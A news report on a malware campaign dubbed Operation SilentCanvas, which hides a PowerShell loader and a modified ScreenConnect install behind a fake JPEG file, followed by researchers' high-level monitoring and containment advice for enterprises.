Security experts warn of a sophisticated JPEG malware campaign targeting enterprises
Researchers warn of a sophisticated JPEG malware campaign using fake image files to deploy remote access malware.
Cybersecurity researchers have uncovered a new malware campaign that disguises malicious software as harmless JPEG image files, apparently to compromise businesses and organisations using remote administration tools.
Table Of Content
Researchers at Cyfirma described the operation as “Operation SilentCanvas” and warned that the campaign demonstrates an advanced level of technical sophistication. The attack uses files disguised as standard image formats to trick victims into launching malware capable of stealing credentials, monitoring activity and maintaining long-term access to infected systems.
The researchers said the exact scale of the campaign remains unclear, with no confirmed number of victims or successful infections disclosed. However, the operation is believed to focus primarily on enterprise environments where remote access software is commonly used for system management and support tasks.
Attack disguises malware as an image file
According to the report, the attack begins when a victim downloads and opens a file named “sysupdate.jpeg”. Although the file appears to be an ordinary image, it instead launches a malicious PowerShell script designed to compromise the system.
Researchers said the malicious file could be distributed through several methods, including phishing emails containing infected attachments, deceptive file-sharing services or fake software updates intended to lure unsuspecting users. The campaign relies heavily on social engineering tactics to persuade victims that the file is safe.
Once executed, the malware downloads additional payloads from attacker-controlled infrastructure and installs a modified version of ConnectWise ScreenConnect, a legitimate remote administration platform commonly used by IT teams. The altered software allows attackers to gain covert remote access to infected devices while avoiding immediate detection.
The malware also attempts to bypass Windows security protections by creating malicious Registry entries and establishing persistence through a fake Windows service named “OneDriveServers”. This allows the attackers to maintain access to compromised systems even after reboots or user logouts.
Researchers noted that the campaign uses encrypted communications to connect with command-and-control infrastructure, helping attackers conceal their activity from security monitoring systems.
Malware capable of surveillance and credential theft
The report found that the malware includes a wide range of surveillance and data theft capabilities. These include credential harvesting, system fingerprinting, screen capture, microphone recording and clipboard monitoring.
Cybersecurity analysts warned that these functions could allow attackers to gather sensitive corporate information, monitor employee activity and move laterally across enterprise networks. Such capabilities are often associated with espionage campaigns or ransomware operations.
Cyfirma described the campaign as highly advanced and professionally organised. The company stated: “The overall tradecraft reflects a professionally engineered and operationally mature intrusion framework capable of supporting long-term covert persistence, credential theft, lateral movement, enterprise espionage, and potential ransomware deployment within enterprise environments.”
The researchers did not attribute the campaign to any known hacking group, country or region. However, the sophistication of the operation suggests it may be linked to experienced threat actors with significant technical resources.
The use of trusted remote administration software as part of the attack chain also reflects a growing trend in cybercrime operations. Threat actors increasingly exploit legitimate tools to blend malicious activity with normal network traffic, making detection more difficult for security teams.
Experts have repeatedly warned that file extensions alone should not be trusted when downloading content from the internet. Attackers often disguise malware as harmless documents, images or software installers to increase the likelihood of infection.
Organisations urged to strengthen monitoring
Security specialists said organisations should closely monitor Windows system processes that attackers commonly abuse during malware deployment. Cyfirma specifically highlighted binaries such as “csc.exe”, “cvtres.exe” and “ComputerDefaults.exe” as potential tools used during the attack chain.
Where possible, businesses were advised to restrict or block these binaries if they are not required for day-to-day operations. Researchers also recommended stricter controls around remote access platforms to reduce the risk of unauthorised access.
The report further urged organisations to implement enhanced monitoring rules for suspicious PowerShell activity, as PowerShell remains one of the most frequently exploited tools in Windows-based cyberattacks. Unusual PowerShell execution patterns can often provide an early warning sign of compromise.
Cybersecurity teams were also advised to isolate any systems exhibiting unexpected ScreenConnect activity immediately. Rapid containment measures may help prevent attackers from spreading across networks or deploying additional malware.
The discovery of Operation SilentCanvas highlights the continued evolution of cybercriminal tactics and the growing challenge businesses face in defending against increasingly deceptive attacks. As threat actors adopt more sophisticated delivery methods and stealth techniques, experts said user awareness and proactive monitoring remain essential parts of enterprise security strategies.
